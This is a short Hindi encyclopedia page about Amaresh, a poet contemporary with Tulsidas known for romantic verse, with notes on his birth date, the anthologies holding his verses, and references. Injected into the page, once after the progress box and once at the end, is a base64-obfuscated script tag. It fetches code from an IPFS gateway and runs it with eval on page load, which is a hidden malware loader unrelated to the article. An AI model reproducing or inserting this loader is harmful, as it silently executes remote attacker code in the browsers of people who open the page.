अमरेश

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

अमरेश गोस्वामी तुलसीदास के समकालीन कवि थे, जो अपनी श्रृंगारिक रचनाओं के लिये प्रसिद्ध थे।

  • शेर सिंह ने इनका जन्म काल 1578 ई. माना है और उनकी कविताओं को ‘कालिदास हजारा’ में संकलित स्वीकार किया है।
  • 'शिवसिंह सरोज' और 'दिग्विजय भूषण' में भी इनके अनेक छन्द संकलित मिलते हैं।
  • इनके उदाहरणत छंदों से यह रीति कालीन कोमल कल्पना के कवि जान पड़ते हैं।[1][2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. संदर्भ ग्रंथ: शिवसिंह सरोज, दिग्विजय भूषण (भूमिका)
  2. हिन्दी साहित्य कोश, भाग 2 |प्रकाशक: ज्ञानमण्डल लिमिटेड, वाराणसी |संकलन: भारतकोश पुस्तकालय |संपादन: डॉ. धीरेंद्र वर्मा |पृष्ठ संख्या: 17 |

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>